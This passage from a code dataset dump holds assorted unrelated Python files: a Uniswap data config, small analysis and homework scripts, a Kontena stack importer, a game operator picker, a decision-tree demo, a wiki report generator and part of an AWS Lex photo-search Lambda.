ThreadPool(THREADS)\n\nwith open('abi/uniswap_factory.abi') as in_f:\n UNISWAP_FACTORY_ABI = json.load(in_f)\n\nwith open('abi/uniswap_exchange.abi') as in_f:\n UNISWAP_EXCHANGE_ABI = json.load(in_f)\n\nwith open('abi/erc_20.abi') as in_f:\n ERC_20_ABI = json.load(in_f)\n\nwith open('abi/str_erc_20.abi') as in_f:\n STR_ERC_20_ABI = json.load(in_f)\n\nwith open('abi/str_caps_erc_20.abi') as in_f:\n STR_CAPS_ERC_20_ABI = json.load(in_f)\n\nUNISWAP_FACTORY_ADDRESS = '0xc0a47dFe034B400B47bDaD5FecDa2621de6c4d95'\n\nuniswap_factory = web3.eth.contract(abi=UNISWAP_FACTORY_ABI, address=UNISWAP_FACTORY_ADDRESS)\n\nHARDCODED_INFO = {\n '0xE0B7927c4aF23765Cb51314A0E0521A9645F0E2A': ('DGD', 'DGD', 9),\n '0xBB9bc244D798123fDe783fCc1C72d3Bb8C189413': ('TheDAO', 'TheDAO', 16),\n '0x42456D7084eacF4083f1140d3229471bbA2949A8': ('Synth sETH', 'sETH old', 18),\n '0x89d24A6b4CcB1B6fAA2625fE562bDD9a23260359': ('Sai Stablecoin v1.0', 'SAI', 18),\n}\n\nDIST_DIR = '../dist/uniswap/'\n\nLIQUIDITY_DATA = os.path.join(DIST_DIR, 'data/liquidity.csv')\n\nPROVIDERS_DATA = os.path.join(DIST_DIR, 'data/providers/{}.csv')\n\nROI_DATA = os.path.join(DIST_DIR, 'data/roi/{}.csv')\n\nVOLUME_DATA = os.path.join(DIST_DIR, 'data/volume/{}.csv')\n\nTOTAL_VOLUME_DATA = os.path.join(DIST_DIR, 'data/total_volume.csv')\n\nTOKENS_DATA = os.path.join(DIST_DIR, 'data/tokens.json')\n\nEVENT_TRANSFER = '0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef'\n\nEVENT_TOKEN_PURCHASE = '0xcd60aa75dea3072fbc07ae6d7d856b5dc5f4eee88854f5b4abf7b680ef8bc50f'\n\nEVENT_ETH_PURCHASE = '0x7f4091b46c33e918a0f3aa42307641d17bb67029427a5369e54b353984238705'\n\nEVENT_ADD_LIQUIDITY = '0x06239653922ac7bea6aa2b19dc486b9361821d37712eb796adfd38d81de278ca'\n\nEVENT_REMOVE_LIQUIDITY = '0x0fbf06c058b90cb038a618f8c2acbf6145f8b3570fd1fa56abb8f0f3f05b36e8'\n\nALL_EVENTS = [EVENT_TRANSFER, EVENT_TOKEN_PURCHASE, EVENT_ETH_PURCHASE, EVENT_ADD_LIQUIDITY, EVENT_REMOVE_LIQUIDITY]\n\nINFOS_DUMP = 'infos.dump'\n\nLAST_BLOCK_DUMP = 'last_block.dump'\n\nGRAPHQL_LOGS_QUERY = '''\n{{\n logs(filter: {{fromBlock: {fromBlock}, toBlock: {toBlock}, addresses: {addresses}, topics: {topics}}}) {{\n data account {{ address }} topics index transaction {{ block {{ number }} }}\n }}\n}}'''\n\nGRAPHQL_ENDPOINT = 'http://localhost:8547/graphql'\n","sub_path":"uniswap/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"624265699","text":"import numpy as np\nspeed = np.loadtxt(r'C:\\Users\\CDT\\Desktop\\GUTS\\MSTanks\\speed.csv', delimiter=',')\nspeed2 = np.loadtxt(r'C:\\Users\\CDT\\Desktop\\GUTS\\MSTanks\\speed2.csv', delimiter=',')\nrotation = np.loadtxt(r'C:\\Users\\CDT\\Desktop\\GUTS\\MSTanks\\rotation.csv', delimiter=',')\nd = np.sqrt(((speed[16,0] - speed[0,0])**2) + ((speed[16,1]-speed[0,1])**2))\nd2 = np.sqrt(((speed2[16,0] - speed2[0,0])**2) + ((speed2[16,1]-speed2[0,1])**2))\ntimebetweenpol = 0.358853\nv = d / (16* timebetweenpol)\nv2 = d2 / (16* timebetweenpol)\navv = (v2 + v)/2\n\navpolltime = np.mean(rotation[:,2])\navrotperpoll = rotation[:,3]\n\nfor i in range(len(avrotperpoll)):\n if avrotperpoll[i] < 0:\n avrotperpoll[i] = avrotperpoll[i] + 360\n print(avrotperpoll[i])\n\ndegreepersecond = np.mean(avrotperpoll /0.358853)\n\n\n","sub_path":"speedrotation.py","file_name":"speedrotation.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} 
+{"seq_id":"520267945","text":"import math\nfrom optparse import OptionParser\nfrom collections import namedtuple\n\npoint = namedtuple('Point', 'x, y')\n\n\n# Длинные читабельные имена функций это хорошо.\n# Короткие не очень читаьбельные - плохо\ndef dist(a, b):\n \"\"\"Calculate distance between two points: a and b.\"\"\"\n return math.sqrt((a.x - b.x) ** 2 + (a.y - b.y) ** 2)\n\n\ndef mycartesian_product(some_list):\n \"\"\"Get cartesian product of a list with itself.\"\"\"\n pr = [] # Плохое имя\n for ind, item1 in enumerate(some_list[:-1], start=1):\n for item2 in some_list[ind:]:\n pr.append((item1, item2))\n\n return pr\n\n\ndef xy_from_file(filename):\n \"\"\"Read in point coordinates from a given file.\"\"\"\n with open(filename) as fobj:\n content = fobj.readlines()\n\n try:\n # ValueError может быть пойман только в момент выполннеия float(number)\n # Потому в try...except лучше заключить только его\n splited = [line.split() for line in content]\n points = [point(float(x), float(y)) for x, y in splited]\n except ValueError:\n return None\n\n return points\n\n\ndef main(filename='test_file.txt'):\n \"\"\"Main function.\"\"\"\n points = xy_from_file(filename)\n cartesian_prod = mycartesian_product(points)\n distances = [dist(p1, p2) for p1, p2 in cartesian_prod]\n\n min_ = min(distances)\n max_ = max(distances)\n\n print('min: %s\\nmax: %s' % (min_, max_))\n\n\nif __name__ == '__main__':\n parser = OptionParser()\n opts, args = parser.parse_args()\n if not args:\n main()\n else:\n main(args[0])\n","sub_path":"homeworks/vlad_yan/1__4__distance/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"212015080","text":"''' File that sets up the parameters for the simulation to be run.\n This is the file that controls the distribution of labeled datapoints\n that both algorithms see, and also the action set with which EXP3 is run.\n'''\n\nimport numpy as np\nimport random\nimport math\nfrom copy import deepcopy\nfrom grinding_polytopes import * \nimport polytope as pc\nimport logging\nlogging.basicConfig()\n\ndef set_params(T, eps_exp3): \n np.random.seed()\n d = 2 # dimension of space\n p = 0.7 \n # variable is controlled by the outside file\n delta = 0.05 #radius of best-responses -- implicitly affects regret\n agent_type = [0]*T\n\n \n agent_type = np.random.binomial(1,p,T)\n\n true_labels = [1 if agent_type[i] else -1 for i in range(T)] \n\n #original feature vectors for agents\n x_real = []\n for i in range(T):\n if agent_type[i]:\n x_real.append(np.array([np.random.normal(0.6, 0.4), np.random.normal(0.4,0.6), 1]))\n else:\n x_real.append(np.array([np.random.normal(0.4, 0.6), np.random.uniform(0.6,0.4), 1]))\n\n calA_size_exp3 = 1000\n\n noise = []\n\n initial = []\n zero = np.array([0, 0, 1])\n one = np.array([1, 1, 1])\n curr_size = 0\n\n while curr_size < calA_size_exp3:\n temp = np.array([np.random.uniform(-1,1), np.random.uniform(-1,1), np.random.uniform(-1,1)])\n dist0 = np.abs(1.0*np.dot(temp,zero)/np.linalg.norm(temp[:d])) \n dist1 = np.abs(1.0*np.dot(temp,one)/np.linalg.norm(temp[:d])) \n if dist0 <= np.sqrt(2) and dist1 <= np.sqrt(2):\n initial.append(temp)\n curr_size += 1\n\n\n calA_size = len(initial)\n\n # construct initial polytope, i.e., [-1,1]^{d+1}\n V = np.array([ np.array([-1, -1, -1]), \n np.array([-1, -1, 1]),\n np.array([-1, 1, -1]),\n np.array([-1, 1, 1]),\n np.array([ 1, -1, -1]),\n np.array([ 1, -1, 1]),\n np.array([ 1, 1, -1]),\n 
np.array([ 1, 1, 1])])\n\n p_init = pc.qhull(V)\n\n # start with a prob and weight of 1 for the org polytope\n calA_exp3 = [init/np.linalg.norm(init[:d]) for init in initial]\n updated = [0]*T\n initial_polytope = Grind_Polytope(p_init, 1.0, 1.0, 2, T, 0.0, 0.0, updated)\n calA_grind = [initial_polytope] \n\n return (T, d, x_real, calA_exp3, calA_grind, agent_type, true_labels, delta, noise, p)\n \n\n","sub_path":"cont_code/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"531244074","text":"import logging\n\nfrom ..models import Stack, Service\nfrom ..utils import log_get_or_create\n\n\nlogger = logging.getLogger(__name__)\n\n\nROLE_GUESSES = dict(\n postgres='database',\n sql='database',\n mariadb='database',\n mongo='database',\n memcache='cache',\n redis='cache',\n celery='worker',\n worker='worker',\n api='backend',\n frontend='frontend',\n web='backend',\n)\n\nDEFAULT_ROLE = 'backend'\n\n\ndef guess_role_from(item):\n \"\"\"\n >>> guess_role_from('registry.plat2.leonidasoy.fi/leonidas2017-mariadb')\n 'database'\n \"\"\"\n for role_guess, guessed_role in ROLE_GUESSES.items():\n if role_guess in item:\n return guessed_role\n\n\ndef guess_role(service_slug, service_dict, default_role=DEFAULT_ROLE):\n \"\"\"\n Tries to guess role first from service_slug and then service_dict['image'].\n \"\"\"\n role = guess_role_from(service_slug)\n if role:\n return role\n\n role = guess_role_from(service_dict.get('image', ''))\n if role:\n return role\n\n return default_role\n\n\ndef env_list_to_dict(env_list):\n \"\"\"\n >>> env_list_to_dict(['KONTENA_LB_MODE=http', 'KONTENA_LB_VIRTUAL_HOSTS=leonidasoy.fi'])\n {'KONTENA_LB_MODE': 'http', 'KONTENA_LB_VIRTUAL_HOSTS': 'leonidasoy.fi'}\n \"\"\"\n return dict(env_item.split('=', 1) for env_item in env_list)\n\n\ndef get_service_env(service_dict, env_name, default=None):\n environment = service_dict.get('environment', dict())\n\n if isinstance(environment, list):\n environment = env_list_to_dict(environment)\n\n return environment.get(env_name, default)\n\n\ndef import_stack(stack_slug, stack_dict, project, grid, environment='staging'):\n stack, created = Stack.objects.get_or_create(\n slug=stack_slug,\n defaults=dict(\n name=stack_slug,\n project=project,\n grid=grid,\n environment=environment,\n description=stack_dict.get('description', ''),\n )\n )\n\n log_get_or_create(logger, stack, created)\n\n for service_slug, service_dict in stack_dict['services'].items():\n role = guess_role(service_slug, service_dict)\n hostnames = get_service_env(service_dict, 'KONTENA_LB_VIRTUAL_HOSTS', '').split()\n hostname = hostnames[0] if hostnames else ''\n\n service, created = Service.objects.get_or_create(\n stack=stack,\n slug=service_slug,\n defaults=dict(\n name=service_slug,\n description=service_dict.get('description', ''),\n role=role,\n hostname=hostname,\n )\n )\n\n log_get_or_create(logger, service, created)\n\n return stack\n","sub_path":"cmdb/importers/kontena.py","file_name":"kontena.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"31604935","text":"from subprocess import check_output\n\n\ndef get_armada_host_ip():\n output = check_output(['ip', 'route']).decode()\n for line in output.splitlines():\n if line.startswith('default'):\n return line.split()[2]\n return '172.17.0.1'\n\n\nARMADA_API_URL = 
'http://{}:8900'.format(get_armada_host_ip())\n","sub_path":"docker-containers/microservice/packaging/microservice/opt/microservice/microservice/defines.py","file_name":"defines.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"319651981","text":"import enum\nimport json\nimport os\nimport random\n\nfrom typing import Dict, List\n\n\nUSER_DATA_JSON = \"user_data.json\"\n\nR6_ATK = [\n \"Sledge\",\n \"Thatcher\",\n \"Ash\",\n \"Thermite\",\n \"Mick\",\n \"Tick\",\n \"Blitz\",\n \"IQ\",\n \"Fuze\",\n \"Glaz\",\n \"Buck\",\n \"Blackbeard\",\n \"Capitao\",\n \"Hibana\",\n \"Jackal\",\n \"Ying\",\n \"Zofia\",\n \"Dokkaebi\",\n \"Finka\",\n \"Lion\",\n \"Maverick\",\n \"Nomad\",\n \"Gridlock\",\n \"Spooky bitch atk\",\n \"Amaru\",\n \"Kali\",\n]\nR6_DEF = [\n \"Mute\",\n \"Smonk\",\n \"Castle\",\n \"Pulse\",\n \"Dick\",\n \"Rick\",\n \"Jager\",\n \"Bandit\",\n \"God\",\n \"Kapkan\",\n \"Frost\",\n \"Valkyrie\",\n \"Spooky bitch def\",\n \"Echo\",\n \"Mira\",\n \"Lesion\",\n \"Ela\",\n \"Vigil\",\n \"Alibi\",\n \"Maestro\",\n \"Clash\",\n \"Kaid\",\n \"Mozzie\",\n \"Warden\",\n \"Goyo\",\n \"Wamai\",\n]\n\n\nclass OperatorSide(enum.Enum):\n ATTACK = 0\n DEFENSE = 1\n\n\ndef _init():\n if not os.path.exists(USER_DATA_JSON):\n with open(USER_DATA_JSON, \"w\") as f:\n f.write(\"{}\")\n\n\ndef _get_valid_ops(side: OperatorSide, user_id: str) -> List[str]:\n with open(USER_DATA_JSON) as f:\n disabled_ops = json.load(f)\n\n if user_id not in disabled_ops:\n disabled_ops[user_id] = []\n\n with open(USER_DATA_JSON, \"w\") as f:\n json.dump(disabled_ops, f)\n\n if side == OperatorSide.ATTACK:\n possible_ops = R6_ATK\n else:\n possible_ops = R6_DEF\n return [op for op in possible_ops if op.lower() not in disabled_ops[user_id]]\n\n\ndef pick_attackers(user_id: int, num: int) -> List[str]:\n ops = _get_valid_ops(OperatorSide.ATTACK, str(user_id))\n return random.sample(ops, num)\n\n\ndef pick_defenders(user_id: int, num: int) -> List[str]:\n ops = _get_valid_ops(OperatorSide.DEFENSE, str(user_id))\n return random.sample(ops, num)\n\n\ndef disable_operators(user_id: int, ops: List[str]) -> List[str]:\n ops = [op.lower() for op in ops]\n user_str = str(user_id)\n with open(USER_DATA_JSON) as f:\n operators = json.load(f)\n disabled_ops = set(operators.get(user_str, [])) | set(ops)\n operators[user_str] = list(disabled_ops)\n\n with open(USER_DATA_JSON, \"w\") as f:\n json.dump(operators, f)\n return sorted(op.title() for op in operators[user_str])\n\n\ndef enable_operators(user_id: int, ops: List[str]) -> List[str]:\n ops = [op.lower() for op in ops]\n user_str = str(user_id)\n with open(USER_DATA_JSON) as f:\n operators = json.load(f)\n disabled_ops = set(operators.get(user_str, [])) - set(ops)\n operators[user_str] = list(disabled_ops)\n\n with open(USER_DATA_JSON, \"w\") as f:\n json.dump(operators, f)\n return sorted(op.title() for op in operators[user_str])\n\n\ndef get_available_ops(user_id: int) -> Dict[OperatorSide, List[str]]:\n user_str = str(user_id)\n return {\n OperatorSide.ATTACK: _get_valid_ops(OperatorSide.ATTACK, user_str),\n OperatorSide.DEFENSE: _get_valid_ops(OperatorSide.DEFENSE, user_str),\n }\n\n_init()\n","sub_path":"r6_helper.py","file_name":"r6_helper.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"138009203","text":"#!/usr/bin/env python\n#author: lizhen\n#date:\nimport userlog\nimport 
login\nimport tools\n\n\n# Tally up the purchases and write a record\ndef compute_jine(shopping):\n '''\n shopping: item, unit price, quantity\n '''\n all_money = 0\n zongshu = {}\n for i in shopping:\n if zongshu.get(i[0]): # already purchased\n zongshu[i[0]] = [i[1], zongshu[i[0]][1]+ i[2]]\n else:\n zongshu[i[0]] = [i[1], i[2]]\n print("Your purchases this session:".center(50,'*'))\n for k in zongshu:\n print("\\t\\t%s %s %s " % (k, zongshu[k][1], zongshu[k][0]*zongshu[k][1]))\n all_money += zongshu[k][0]*zongshu[k][1]\n print("".center(50, '*'))\n return all_money\n\n# Shopping menu, and shopping operations\ndef menu_list(currentuser):\n exit_flag = False\n shopping_list = []\n gongzi = login.get_balance(currentuser)\n menu = (\n ('Appliances',('Washing machine',2000),('Desktop PC (dell)',5600),('mac',8000)),\n ('Phones',('Huawei',3400), ('Xiaomi',2200),('Lenovo',500)),\n ('Clothing', ('Leather jacket',500),('Shorts', 100),('Dress', 340)),\n\n )\n while not exit_flag:\n for i in range(len(menu)):\n print("%s. %s" % (i, menu[i][0]))\n selected_cls = input("Category to buy [(Q)uit,(B)ack,(S)how]: ") .strip()\n if selected_cls == '':\n continue\n if selected_cls.lower() == 's':\n compute_jine(shopping_list)\n continue\n if selected_cls.lower() == 'q':\n print("Exiting the system........")\n # here we need to check whether the user has already bought anything\n if len(shopping_list) != 0:\n sum_money = compute_jine(shopping_list)\n tools.write_money(currentuser, sum_money)\n else:\n exit(0)\n elif selected_cls.lower() == 'b':\n sum_money = compute_jine(shopping_list)\n tools.write_money(currentuser, sum_money)\n exit_flag = True\n\n elif selected_cls.isdigit() and int(selected_cls) < len(menu):\n w_flag = False\n wuping = menu[int(selected_cls)][1:]\n\n while not w_flag:\n for j in range(len(wuping)):\n print("%s. %s %s" % (j, wuping[j][0], wuping[j][1]))\n selected_wp = input("Item to buy [(Q)uit,(B)ack,(S)how][%s]: " % ( menu[int(selected_cls)][0] )).strip()\n if selected_wp == '':\n continue\n if selected_wp.lower() == 's':\n compute_jine(shopping_list)\n continue\n if selected_wp.lower() == 'q':\n print("Exiting the system......")\n # here we need to check whether the user has already bought anything\n if len(shopping_list) != 0:\n sum_money = compute_jine(shopping_list)\n tools.write_money(currentuser, sum_money)\n exit(0)\n elif selected_wp.lower() == 'b':\n w_flag = True\n elif selected_wp.isdigit() and int(selected_wp) < len(wuping):\n print("You picked [%s], please enter the quantity (default 1)" % wuping[int(selected_wp) ][0],end=' ')\n shuliang = input()\n if shuliang.isdigit():\n shuliang = int(shuliang)\n else:\n shuliang = 1\n # compute the total price and check whether the remaining balance is enough\n # add the item to the shopping cart\n zongqian = wuping[int(selected_wp)][1] * shuliang\n if zongqian <= gongzi:\n # wuping[int(selected_wp)] format: name, unit price\n shopping = (wuping[int(selected_wp)][0], wuping[int(selected_wp)][1], shuliang)\n userlog.shop_log(currentuser, shopping)\n shopping_list.append( shopping )\n gongzi -= zongqian\n #print(shopping_list)\n else:\n print("Your current balance is %s, go earn some more." % gongzi)\n\n else:\n print("Could not recognize your input, please try again")\n continue\n else:\n print("Could not recognize your input, please try again")\n continue\n return shopping_list\n\n\n\nif __name__ == "__main__":\n menu_list('lizhen')","sub_path":"day2/homework/shop.py","file_name":"shop.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"386310800","text":"# Enrichment_Report.py\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom functions import *\r\n\r\ndef main():\r\n \r\n Enrichment_Time_Table = """{| class="wikitable"\r\n!colspan="3" style="background: #7fffd4| Enrichment Time\r\n|-\r\n! Date !! Days !! 
% On Time\r\n\"\"\" \r\n \r\n for i, b in enumerate(run_sql_statement('Enrichment_Time')):\r\n if i == 0:\r\n try:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| Yesterday || \"\"\" + \"{0:.1f}\".format(b[1]) + \"\"\" || \"\"\" + \"{:.0%}\".format(b[2]) + \"\"\"\r\n\"\"\"\r\n except:\r\n try:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| Yesterday || 0 || \"\"\" + \"{:.0%}\".format(b[2]) + \"\"\"\r\n\"\"\" \r\n except:\r\n try:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| Yesterday || \"\"\" + \"{0:.1f}\".format(b[1]) + \"\"\" ||0\r\n\"\"\" \r\n except:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| Yesterday || 0 ||0\r\n\"\"\" \r\n\r\n if i == 1:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| Last Week || \"\"\" + \"{0:.1f}\".format(b[1]) + \"\"\" || \"\"\" + \"{:.0%}\".format(b[2]) + \"\"\"\r\n\"\"\"\r\n if i == 2:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| MTD || \"\"\" + \"{0:.1f}\".format(b[1]) + \"\"\" || \"\"\" + \"{:.0%}\".format(b[2]) + \"\"\"\r\n\"\"\"\r\n if i == 3:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| Last Month || \"\"\" + \"{0:.1f}\".format(b[1]) + \"\"\" || \"\"\" + \"{:.0%}\".format(b[2]) + \"\"\"\r\n\"\"\" \r\n if i == 4:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| This month Last Year || \"\"\" + \"{0:.1f}\".format(b[1]) + \"\"\" || \"\"\" + \"{:.0%}\".format(b[2]) + \"\"\"\r\n\"\"\"\r\n if i == 5:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| YTD || \"\"\" + \"{0:.1f}\".format(b[1]) + \"\"\" || \"\"\" + \"{:.0%}\".format(b[2]) + \"\"\"\r\n\"\"\"\r\n if i == 6:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| Last Year || \"\"\" + \"{0:.1f}\".format(b[1]) + \"\"\" || \"\"\" + \"{:.0%}\".format(b[2]) + \"\"\" \r\n|}\r\n\"\"\"\r\n\r\n Yesterdays_Enrichment_Table = \"\"\"{| class=\"wikitable sortable\"\r\n! style=\"background: #7fffd4|Order Number !! style=\"background: #7fffd4|Item Number !! style=\"background: #7fffd4|ER Number !! style=\"background: #7fffd4|Order Entered !! style=\"background: #7fffd4|Order Reentered !! style=\"background: #7fffd4|Work Days\r\n\"\"\"\r\n \r\n for h in run_sql_statement('Yesterdays_Enrichment'):\r\n for c in range(6):\r\n if c == 0:\r\n Yesterdays_Enrichment_Table = Yesterdays_Enrichment_Table + \"\"\"\r\n|-\r\n| \"\"\" + str(h[c])\r\n \r\n elif c == 3 or c == 4:\r\n try:\r\n Yesterdays_Enrichment_Table = Yesterdays_Enrichment_Table + \"\"\"|| style=\"background: #ffffff| \"\"\"+ \"{:%d-%b-%y %H:%M %p}\".format(h[c]) # for a new column\r\n except:\r\n Yesterdays_Enrichment_Table = Yesterdays_Enrichment_Table + \"\"\"|| style=\"background: #ffffff| \"\"\"+ str(h[c]) # for a new column\r\n else:\r\n Yesterdays_Enrichment_Table = Yesterdays_Enrichment_Table + \"\"\"|| style=\"background: #ffffff| \"\"\"+ str(h[c]) # for a new column\r\n \r\n\r\n\r\n Yesterdays_Enrichment_Table = Yesterdays_Enrichment_Table + \"\"\"\r\n|}\"\"\"\r\n\r\n\r\n Shiment_History_Table = \"\"\"{| class=\"wikitable sortable\"\r\n! style=\"background: #7fffd4|Order Number !! Priority !! style=\"background: #7fffd4|Item Number !! style=\"background: #7fffd4|ER Number !! style=\"background: #7fffd4|Order Entered !! style=\"background: #7fffd4|Order Shipped !! 
style=\"background: #7fffd4|Work Days\r\n\"\"\"\r\n \r\n for h in run_sql_statement('Shipment_History'):\r\n for c in range(7):\r\n if c == 0:\r\n Shiment_History_Table = Shiment_History_Table + \"\"\"\r\n|-\r\n| \"\"\" + str(h[c])\r\n \r\n elif c == 3 or c == 4:\r\n try:\r\n Shiment_History_Table = Shiment_History_Table + \"\"\"|| style=\"background: #ffffff| \"\"\"+ \"{:%d-%b-%y %H:%M %p}\".format(h[c]) # for a new column\r\n except:\r\n Shiment_History_Table = Shiment_History_Table + \"\"\"|| style=\"background: #ffffff| \"\"\"+ str(h[c]) # for a new column\r\n else:\r\n Shiment_History_Table = Shiment_History_Table + \"\"\"|| style=\"background: #ffffff| \"\"\"+ str(h[c]) # for a new column\r\n \r\n\r\n\r\n Shiment_History_Table = Shiment_History_Table + \"\"\"\r\n|}\"\"\"\r\n\r\n\r\n\r\n\r\n \r\n article = \"\"\"\r\n== Enrichment Time ==\r\n\r\nTurnaround goal is 5 days or under 95% of the time.\r\n\r\n\"\"\" + Enrichment_Time_Table + \"\"\"\r\n== Yesterday's Enrichment ==\r\n\r\n\"\"\" + Yesterdays_Enrichment_Table + \"\"\"\r\n\r\n\r\n== Shipping Pirority Metric ==\r\n\r\nfile:shipments.jpg|Priority Breakdown\r\nfile:agile.jpg|Agile Order Level\r\nFile:total duration.png|Total Durations\r\nFile:Monthly performance.jpg|Monthly FTS Performance\r\nfile:shipdist.jpg|Shipping Duration Distribution (all)\r\nfile:monthshipdist.jpg|Shipping Duration Distribution (month)\r\nfile:sc.png|SC Performance\r\nfile:ftp eng.png|Eng Performance\r\nfile:ftp eng monthly.png|Eng Performance Month\r\nfile:ftp prod.png|Production Performance\r\n\r\n\r\n\r\n\r\n== Shipment History ==\r\n\r\n\"\"\" + Shiment_History_Table + \"\"\"\r\n\r\n

\r\n\r\n\r\n\r\n\r\nPrevious\r\nNext\r\n\r\n\r\n[[category:Automated Reports]][[category:Enrichment]][[category:Engineering]]\r\n \"\"\" \r\n update_wiki_page(article)\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"Enrichment_Report.py","file_name":"Enrichment_Report.py","file_ext":"py","file_size_in_byte":6557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"554963720","text":"from CreateDT.ID3 import createID3Tree\nfrom CreateDT.C4_5 import createC4_5Tree\nfrom CreateDT.CART import createCARTTree\nfrom CreateDT.PlotDT import createPlot\nimport matplotlib.pyplot as plt\n\n# 读取数据集文件\ndef loadDataSet(fileName):\n \"\"\"\n :param fileName:数据集文件\n :return:数据集\n \"\"\"\n file = open(fileName) # 打开数据集文件\n line = file.readline() # 读取每行所有元素\n dataSet = [] # 数据集初始化\n while line:\n data = line.strip('\\n').split(',') # 按照','划分数据,并剔除回车符\n dataSet.append(data) # 将每行数据放到数据集\n line = file.readline()\n file.close()\n return dataSet\n\n# 构造原始数据集和属性集合\noriginalDataSet = loadDataSet('DataSet/watermelon.txt')\nlabels = originalDataSet[0]\ndataSet = originalDataSet[1:]\n\ndef showDT(dataSet, labels):\n \"\"\"\n :param dataSet:数据集\n :param labels:属性标签\n \"\"\"\n\n # ID3算法生成分类决策树\n ID3Tree = createID3Tree(list(dataSet), list(labels))\n print('The ID3 Decision Tree is', ID3Tree)\n\n # C4.5算法生成分类决策树\n C4_5Tree = createC4_5Tree(list(dataSet), list(labels))\n print('The C4.5 Decision Tree is', C4_5Tree)\n\n # CART算法生成分类决策树\n CARTTree = createCARTTree(list(dataSet), list(labels))\n print('The CART Decision Tree is', CARTTree)\n\n # 显示各个决策树\n createPlot(ID3Tree, 'ID3 Decision Tree')\n createPlot(C4_5Tree, 'C4.5 Decision Tree')\n createPlot(CARTTree, 'CART Decision Tree')\n plt.show() # 显示决策树\n\nshowDT(dataSet, labels)\n","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"573145710","text":"import math\nimport dateutil.parser\nimport os\nimport time\nimport logging\nimport boto3\nimport json\n\nimport requests\nfrom requests_aws4auth import AWS4Auth\n\n\nregion = 'us-east-1' # e.g. 
us-east-1\nservice = 'es'\ncredentials = boto3.Session().get_credentials()\nawsauth = AWS4Auth(credentials.access_key, credentials.secret_key, region, service, session_token=credentials.token)\n\nhost = 'https://search-photo-storage-3gex4uqz77gf2abn5bvis25ilm.us-east-1.es.amazonaws.com' # the Amazon ES domain, with https://\nindex = 'photos'\ntype = '_search'\nurl = host + '/' + index + '/' + type + '/'\n\nheaders = { \"Content-Type\": \"application/json\" }\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\n\n\"\"\" --- Helpers to build responses which match the structure of the necessary dialog actions --- \"\"\"\n\n\ndef get_slots(intent_request):\n return intent_request['currentIntent']['slots']\n\n\ndef elicit_slot(session_attributes, intent_name, slots, slot_to_elicit, message):\n return {\n 'sessionAttributes': session_attributes,\n 'dialogAction': {\n 'type': 'ElicitSlot',\n 'intentName': intent_name,\n 'slots': slots,\n 'slotToElicit': slot_to_elicit,\n 'message': message\n }\n }\n\n\ndef close(session_attributes, fulfillment_state, message):\n response = {\n 'sessionAttributes': session_attributes,\n 'dialogAction': {\n 'type': 'Close',\n 'fulfillmentState': fulfillment_state,\n 'message': message\n }\n }\n\n return response\n\n\ndef delegate(session_attributes, slots):\n return {\n 'sessionAttributes': session_attributes,\n 'dialogAction': {\n 'type': 'Delegate',\n 'slots': slots\n }\n }\n\n\n\"\"\" --- Helper Functions --- \"\"\"\n\n\ndef parse_int(n):\n try:\n return int(n)\n except Exception:\n return False\n\n\ndef build_validation_result(is_valid, violated_slot, message_content):\n if message_content is None:\n return {\n \"isValid\": is_valid,\n \"violatedSlot\": violated_slot,\n }\n\n return {\n 'isValid': is_valid,\n 'violatedSlot': violated_slot,\n 'message': {'contentType': 'PlainText', 'content': message_content}\n }\n\n\ndef isvalid_date(date):\n try:\n dateutil.parser.parse(date)\n return True\n except ValueError:\n return False\n\n\ndef validate_searchkey(keyword_1,keyword_2):\n keywords = ['tree', 'person', 'dog', 'glass','milk','coffee cup', 'cup', 'alcohol','human','finger','face', 'wine glass', 'goblet']\n if keyword_1 is not None and keyword_1.lower() not in keywords:\n return build_validation_result(False,\n 'searchkeyone',\n 'Sorry, we only have {}, would you like a different type of photo? '.format(keywords))\n\n if keyword_2 is not None and keyword_2.lower() not in keywords:\n \n return build_validation_result(False,\n 'searchkeytwo',\n 'Sorry, we only have {}, would you like a different type of photo? 
